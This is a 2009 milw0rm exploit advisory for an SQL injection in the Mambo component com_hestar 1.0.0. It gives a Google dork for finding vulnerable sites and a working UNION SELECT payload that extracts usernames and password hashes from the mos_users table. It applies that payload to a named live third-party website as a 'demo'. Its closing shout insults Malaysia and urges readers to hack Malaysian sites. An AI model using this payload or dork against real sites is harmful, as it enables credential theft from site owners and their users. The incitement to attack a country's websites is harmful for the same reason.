Mambo Component com_hestar Remote SQL Injection Vulnerability

## com_hestar 1.0.0 ##
## Author : M3NW5 (M3NW5[at]hackermail[dot]com) ##
## Homepage : http://www.indonesiancoder.com ##
## Date : Monday, Semptember 07,2009 ##


[ Software Information ]

[+] Software : com_hestar
[+] Version : 1.0.0
[+] Provider : Netvistun - netvistun@netvistun.is
[+] Web Provider : www.netvistun.is
[+] Vulnerability : SQL injection
[+] Google Dork : inurl:"com_hestar"

#####################################################
[ POC ]

http://127.0.0.1/index.php?option=com_hestar&task=showlist&id=-3 union select concat_ws(0x3a,username,password)+from+mos_users--


[ Demo ]

http://www.arbae.is/index.php?option=com_hestar&task=showlist&id=-3 union select concat_ws(0x3a,username,password)+from+mos_users--
#####################################################

[ Greetings ]

[+] All of Indonesian Coder Member, Don Tukulesto, mistersaint, gonzhack, m364tr0n, cyb3r_tr0n, TUCKER, Petrucii, Chercut,
Senot, Joker, Rebel, Quick_5ilv3r, ran, m4ho666, DenBayan, vyc0d
[+] All of Surabayahackerlink Member, Awan, Plaque, rey_cute, Tuex, XNITRO, DraCoola.com
[+] ServerIsDown.org, Jack-, Yadoy666, kecemplungkalen, xshadow, H4ck3rKu
[+] Kill-9 Crew, kaMtiEz, Arianom

[ SHOUT ]

STILL FVCKED TO MALAYSIA, TRULLY THIEF COUNTRY IN ASIA.
Let's Hack Malaysian site. PROUD TO BE INDONESIAN !!!!!

[ Special to ]

Anggie Lestari Putri sulung dari keluarga bapak dodi dan ibu dini ^^ i lope yu pull...

# milw0rm.com [2009-09-09]

Posted in: Bugs,Hacking